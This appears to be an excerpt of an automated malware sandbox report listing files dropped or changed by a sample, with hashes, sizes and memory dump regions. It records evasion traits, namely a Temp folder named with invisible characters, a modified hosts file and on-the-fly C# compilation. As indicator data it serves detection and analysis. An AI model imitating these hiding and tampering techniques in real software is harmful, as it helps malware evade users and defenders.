                                                                                                • C:\Users\Admin\AppData\Local\Temp\  ​​ ‎ ‎ ‎\Common Files\Documents\ResumeUnprotect.pdf
                                                                                                  Filesize

                                                                                                  289KB

                                                                                                  MD5

                                                                                                  72549d6168f6a6a24395ff0ea7938819

                                                                                                  SHA1

                                                                                                  9e01bece33127759d2c34d36d78365365c7b22b1

                                                                                                  SHA256

                                                                                                  d491806cdbb63e4a7c64ec9391bbef12768da135d0177b3cb60079d28a5507d0

                                                                                                  SHA512

                                                                                                  798264eb1f463c2f96e61791f26f7e449f4c1b34f008cb1da1b17be8b7c43d36edb7da372c19d50c60e5fbc3f435486004aeec1d6be14cd257aa833ff936b2a1

                                                                                                • C:\Users\Admin\AppData\Local\Temp\  ​​ ‎ ‎ ‎\Common Files\Documents\SaveRedo.pdf
                                                                                                  Filesize

                                                                                                  204KB

                                                                                                  MD5

                                                                                                  42bb11baa7120d09d3517b134af327f2

                                                                                                  SHA1

                                                                                                  9be9d6255417de5e36a6a7a10f7702cfc7eccf69

                                                                                                  SHA256

                                                                                                  51e975e615e1f140fff6be2d39855fb4c0112c62bfb2ceed66e4f7e9be7e4fbf

                                                                                                  SHA512

                                                                                                  f6690f3f529f937a595a13a874c64ee5856859cadd1f943899a91098ae889e18ee36e920bfcba66876216155b9270ab41dadadd45dee1d4166224cc5b73c2791

                                                                                                • C:\Users\Admin\AppData\Local\Temp\  ​​ ‎ ‎ ‎\Common Files\Documents\SyncApprove.docx
                                                                                                  Filesize

                                                                                                  297KB

                                                                                                  MD5

                                                                                                  6e13afd9f7e325a2d8bdd6dccdbfc218

                                                                                                  SHA1

                                                                                                  f90d7598292f9910acf06fedb8ba4f89336e06da

                                                                                                  SHA256

                                                                                                  1d9c7626605302f43b94c0578bc75ceca30417bbd1f4fc585ae5ee9811c59854

                                                                                                  SHA512

                                                                                                  c98f1f1c521cc7acd345e8f789b3bc0eb2a5e0d9bc0661535d20ba779040a1eac91e67223abcd790751efaf86ef3a761600529f1fac7d958f8068489b37ce634

                                                                                                • C:\Users\Admin\AppData\Local\Temp\  ​​ ‎ ‎ ‎\Common Files\Documents\TestRedo.pdf
                                                                                                  Filesize

                                                                                                  374KB

                                                                                                  MD5

                                                                                                  b692d587f52b1cd641ee18fbd20ba335

                                                                                                  SHA1

                                                                                                  80b1a808dc49a1ed99dc6681de1e509765473e31

                                                                                                  SHA256

                                                                                                  c8fdced06ef71e6f100ea3cebde1265eae27a3e98be5f4eaaa872eb0dcd7c4df

                                                                                                  SHA512

                                                                                                  28f061e9ee95b1feb580c7c65af2f62cb05c63a291584894dc24f4b9546e75a6999bb861b41cbba2fcf54f9cd84cfacdf2d1df1cfe965cf59a2b35ba07f34697

                                                                                                • C:\Windows\System32\drivers\etc\hosts
                                                                                                  Filesize

                                                                                                  2KB

                                                                                                  MD5

                                                                                                  f99e42cdd8b2f9f1a3c062fe9cf6e131

                                                                                                  SHA1

                                                                                                  e32bdcab8da0e3cdafb6e3876763cee002ab7307

                                                                                                  SHA256

                                                                                                  a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

                                                                                                  SHA512

                                                                                                  c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

                                                                                                • \??\c:\Users\Admin\AppData\Local\Temp\3z3wn0nz\3z3wn0nz.0.cs
                                                                                                  Filesize

                                                                                                  1004B

                                                                                                  MD5

                                                                                                  c76055a0388b713a1eabe16130684dc3

                                                                                                  SHA1

                                                                                                  ee11e84cf41d8a43340f7102e17660072906c402

                                                                                                  SHA256

                                                                                                  8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                                                  SHA512

                                                                                                  22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                                                • \??\c:\Users\Admin\AppData\Local\Temp\3z3wn0nz\3z3wn0nz.cmdline
                                                                                                  Filesize

                                                                                                  607B

                                                                                                  MD5

                                                                                                  fb10ec9a459fbc2963abd88299fa047d

                                                                                                  SHA1

                                                                                                  1c4170749e13872a4d5c7630177e11837666579a

                                                                                                  SHA256

                                                                                                  4e1991ae1697aec1cc6c16fbd846f7f584a89fc2bde867268350a6f377cd7c08

                                                                                                  SHA512

                                                                                                  5f4b925095090a1ba2ade30868a7a64bfdd19b36f7c31fead4429e38a9bd4e26d5b97e864a3bbb6d01611df7a8cdf1c0dc50b52f1f375398dcc2505e45e57c51

                                                                                                • \??\c:\Users\Admin\AppData\Local\Temp\3z3wn0nz\CSC1331DC27BF144699A0F78FB8577DB648.TMP
                                                                                                  Filesize

                                                                                                  652B

                                                                                                  MD5

                                                                                                  e028ca2aec424986e2b71da7dea47c25

                                                                                                  SHA1

                                                                                                  a6225bc90acb697a469c02b3df5c8477dfe9afb0

                                                                                                  SHA256

                                                                                                  7c578321a5acf81a0bb98e2fb833d3ded0dea3bc0bed54bc1bebb99841389793

                                                                                                  SHA512

                                                                                                  0efba1d261538b39c6c76d971f9604903963fb0532ab1a740e1fc299d1aa061c53d2781b1aeb3a67ff40e7dbde40698d1816140d7e7d4a60598fc1e02c1b0a3f

                                                                                                • memory/2784-307-0x00007FFEE6320000-0x00007FFEE6344000-memory.dmp
                                                                                                  Filesize

                                                                                                  144KB

                                                                                                • memory/2784-337-0x000002A0C5240000-0x000002A0C55B5000-memory.dmp
                                                                                                  Filesize

                                                                                                  3.5MB

                                                                                                • memory/2784-72-0x000002A0C5240000-0x000002A0C55B5000-memory.dmp
                                                                                                  Filesize

                                                                                                  3.5MB

                                                                                                • memory/2784-64-0x00007FFEE6220000-0x00007FFEE622D000-memory.dmp
                                                                                                  Filesize

                                                                                                  52KB

                                                                                                • memory/2784-322-0x00007FFED6EE0000-0x00007FFED734E000-memory.dmp
                                                                                                  Filesize

                                                                                                  4.4MB

                                                                                                • memory/2784-62-0x00007FFEE6230000-0x00007FFEE6249000-memory.dmp
                                                                                                  Filesize

                                                                                                  100KB

                                                                                                • memory/2784-60-0x00007FFED6920000-0x00007FFED6A91000-memory.dmp
                                                                                                  Filesize

                                                                                                  1.4MB

                                                                                                • memory/2784-58-0x00007FFEE6250000-0x00007FFEE626F000-memory.dmp
                                                                                                  Filesize

                                                                                                  124KB

                                                                                                • memory/2784-56-0x00007FFEE58D0000-0x00007FFEE58E9000-memory.dmp
                                                                                                  Filesize

                                                                                                  100KB

                                                                                                • memory/2784-54-0x00007FFEE58F0000-0x00007FFEE591D000-memory.dmp
                                                                                                  Filesize

                                                                                                  180KB

                                                                                                • memory/2784-30-0x00007FFEE6320000-0x00007FFEE6344000-memory.dmp
                                                                                                  Filesize

                                                                                                  144KB

                                                                                                • memory/2784-71-0x00007FFEE11D0000-0x00007FFEE1288000-memory.dmp
                                                                                                  Filesize

                                                                                                  736KB

                                                                                                • memory/2784-48-0x00007FFEE6480000-0x00007FFEE648F000-memory.dmp
                                                                                                  Filesize

                                                                                                  60KB

                                                                                                • memory/2784-25-0x00007FFED6EE0000-0x00007FFED734E000-memory.dmp
                                                                                                  Filesize

                                                                                                  4.4MB

                                                                                                • memory/2784-66-0x00007FFEE61F0000-0x00007FFEE621E000-memory.dmp
                                                                                                  Filesize

                                                                                                  184KB

                                                                                                • memory/2784-82-0x00007FFED6DC0000-0x00007FFED6ED8000-memory.dmp
                                                                                                  Filesize

                                                                                                  1.1MB

                                                                                                • memory/2784-74-0x00007FFEE6320000-0x00007FFEE6344000-memory.dmp
                                                                                                  Filesize

                                                                                                  144KB

                                                                                                • memory/2784-70-0x00007FFED6EE0000-0x00007FFED734E000-memory.dmp
                                                                                                  Filesize

                                                                                                  4.4MB

                                                                                                • memory/2784-77-0x00007FFEE5850000-0x00007FFEE5864000-memory.dmp
                                                                                                  Filesize

                                                                                                  80KB

                                                                                                • memory/2784-78-0x00007FFEE5D60000-0x00007FFEE5D6D000-memory.dmp
                                                                                                  Filesize

                                                                                                  52KB

                                                                                                • memory/2784-285-0x00007FFEE6250000-0x00007FFEE626F000-memory.dmp
                                                                                                  Filesize

                                                                                                  124KB

                                                                                                • memory/2784-73-0x00007FFED63E0000-0x00007FFED6755000-memory.dmp
                                                                                                  Filesize

                                                                                                  3.5MB

                                                                                                • memory/2784-317-0x00007FFED63E0000-0x00007FFED6755000-memory.dmp
                                                                                                  Filesize

                                                                                                  3.5MB

                                                                                                • memory/2784-315-0x00007FFEE61F0000-0x00007FFEE621E000-memory.dmp
                                                                                                  Filesize

                                                                                                  184KB

                                                                                                • memory/2784-313-0x00007FFEE6230000-0x00007FFEE6249000-memory.dmp
                                                                                                  Filesize

                                                                                                  100KB

                                                                                                • memory/2784-320-0x00007FFED6DC0000-0x00007FFED6ED8000-memory.dmp
                                                                                                  Filesize

                                                                                                  1.1MB

                                                                                                • memory/2784-316-0x00007FFEE11D0000-0x00007FFEE1288000-memory.dmp
                                                                                                  Filesize

                                                                                                  736KB

                                                                                                • memory/2784-306-0x00007FFED6EE0000-0x00007FFED734E000-memory.dmp
                                                                                                  Filesize

                                                                                                  4.4MB

                                                                                                • memory/2784-321-0x00007FFED6920000-0x00007FFED6A91000-memory.dmp
                                                                                                  Filesize

                                                                                                  1.4MB

                                                                                                • memory/4320-92-0x0000025AD4B20000-0x0000025AD4B42000-memory.dmp
                                                                                                  Filesize

                                                                                                  136KB

                                                                                                • memory/5136-201-0x000001E9E1210000-0x000001E9E1218000-memory.dmp
                                                                                                  Filesize

                                                                                                  32KB